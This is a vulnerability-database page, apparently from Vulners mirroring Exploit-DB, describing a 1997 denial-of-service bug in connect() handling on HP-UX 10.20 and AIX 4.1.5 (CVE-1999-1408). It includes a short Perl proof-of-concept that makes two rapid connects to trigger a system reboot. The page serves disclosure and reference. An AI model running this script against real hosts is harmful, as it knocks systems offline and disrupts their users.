Lucene search
+L

HP HP-UX 10.20 / IBM AIX 4.1.5 - 'connect()' Denial of Service

🗓️ 05 Mar 1997 00:00:00Reported by Cahya WirawanType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 23 Views

Denial of Service vulnerability in HP-UX and AIX due to connect() handling bug causing reboots.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-1999-1408
12 Sep 200104:00
cve
cvelist
Cvelist
CVE-1999-1408
12 Sep 200104:00
cvelist
euvd
EUVD
EUVD-1999-1389
7 Oct 202500:30
euvd
nvd
NVD
CVE-1999-1408
5 Mar 199705:00
nvd
source: https://www.securityfocus.com/bid/352/info


Certain versions of AIX and HP/UX contained a bug in the way the OS handled the connect system call. The connect call is used to initiate a connection on a socket. Because of the flaw in the handling code under AIX certain versions will reboot when given two connects, one to a fixed port (a number of different ports were found to trigger this behaviour) and then another random port connection immediately thereafter.

#!/usr/local/bin/perl5
use Socket;

socket (SOCK,AF_INET,SOCK_STREAM,0);
$iaddr = inet_aton('localhost');
$paddr = sockaddr_in('23',$iaddr);
connect SOCK,$paddr;
shutdown SOCK,2;
$paddr = sockaddr_in('24',$iaddr);
connect SOCK,$paddr;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Jun 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 22.1
EPSS0.01009
23